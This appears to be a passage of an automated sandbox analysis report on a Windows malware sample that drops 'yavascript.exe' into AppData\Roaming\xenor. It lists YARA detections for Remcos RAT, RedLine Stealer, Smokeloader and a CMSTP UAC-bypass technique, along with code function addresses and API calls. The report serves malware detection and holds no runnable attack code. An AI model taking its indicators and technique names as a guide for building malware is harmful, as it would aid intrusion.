Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0210AF28 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0210AF54 OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0210CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0076CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0076AF54 OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0076AF28 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0214AF28 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0214AF54 OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0214CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0219AF28 OpenProcess,NtSuspendProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0219AF54 OpenProcess,NtResumeProcess,CloseHandle
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0219CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02105B1C ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00765B1C ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02145B1C ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_02195B1C ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0041D071
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_004520D2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0043D098
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00437150
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_004361AA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00426254
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00431377
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0041E5DF
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0044C739
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_004267CB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0043C9DD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00432A49
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0043CC0C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00434D22
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00426E73
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00440E20
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0043CE3B
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00412F45
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00452F00
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_00426FAD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02117214
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0210D2D8
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0212D2FF
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02142339
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_021273B7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02131087
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0212D0A2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_021170DA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02126411
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_021164BB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02116A32
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0210E846
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0212CE73
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_0212CC44
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe, Code function: 0_2_02122CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00431377
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_007770DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0078D0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00791087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00777214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0078D2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0076D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_007A2339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_007873B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00786411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_007764BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0076E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00776A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0078CC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_00782CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 17_2_0078CE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00431377
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02157214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0214D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0216D2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02182339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_021673B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02171087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0216D0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_021570DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02166411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_021564BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02156A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0214E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0216CE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_0216CC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 20_2_02162CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00431377
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021A7214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0219D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021BD2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021D2339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021B73B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021C1087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021BD0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021A70DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021B6411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021A64BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021A6A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_0219E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021BCE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021BCC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, Code function: 38_2_021B2CB0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 0075234E appears 37 times
